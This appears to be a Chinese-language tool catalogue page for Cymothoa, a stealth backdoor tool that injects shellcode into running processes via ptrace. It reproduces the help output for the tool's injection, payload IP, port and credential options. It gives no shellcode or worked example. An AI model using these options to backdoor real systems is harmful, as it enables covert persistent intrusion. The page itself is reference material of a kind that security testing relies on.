Cymothoa 介绍

Cymothoa是一个隐形backdooring工具,即注入后门的shellcode到现在运行的进程。该工具使用ptrace库(适用于几乎所有的*nix中),篡改进程和感染他们。

资料来源:http://cymothoa.sourceforge.net/
Cymothoa 首页
Cymothoa 源代码版本库

包含在cymothoa包工具

bgrep - 二进制的grep

:~# bgrep
bgrep version: 0.2
usage: bgrep <hex> [<path> [...]]

cymothoa - 隐形backdooring工具

:~# cymothoa -h
                              _
                          _  | |
  ____ _   _ ____   ___ _| |_| |__   ___  _____
 / ___) | | |    \ / _ (_   _)  _ \ / _ \(____ |
( (___| |_| | | | | |_| || |_| | | | |_| / ___ |
 \____)\__  |_|_|_|\___/  \__)_| |_|\___/\_____|
      (____/
Ver.1 (beta) - Runtime shellcode injection, for stealthy backdoors...

By codwizard ()
from ES-Malaria by ElectronicSouls (http://www.0x4553.org).

Usage:
    cymothoa -p <pid> -s <shellcode_number> [options]

Main options:
    -p  process pid
    -s  shellcode number
    -l  memory region name for shellcode injection (default /lib/ld)
        search for "r-xp" permissions, see /proc/pid/maps...
    -m  memory region name for persistent memory (default /lib/ld)
        search for "rw-p" permissions, see /proc/pid/maps...
    -h  print this help screen
    -S  list available shellcodes

Injection options (overwrite payload flags):
    -f  fork parent process
    -F  don't fork parent process
    -b  create payload thread (probably you need also -F)
    -B  don't create payload thread
    -w  pass persistent memory address
    -W  don't pass persistent memory address
    -a  use alarm scheduler
    -A  don't use alarm scheduler
    -t  use setitimer scheduler
    -T  don't use setitimer scheduler

Payload arguments:
    -j  set timer (seconds)
    -k  set timer (microseconds)
    -x  set the IP
    -y  set the port number
    -r  set the port number 2
    -z  set the username (4 bytes)
    -o  set the password (8 bytes)
    -c  set the script code (ex: "#!/bin/sh\nls; exit 0")
        escape codes will not be interpreted...

udp_server - Cymothoa使用UDP服务

:~# udp_server
usage: udp_server port

cymothoa 示例

:~# coming soon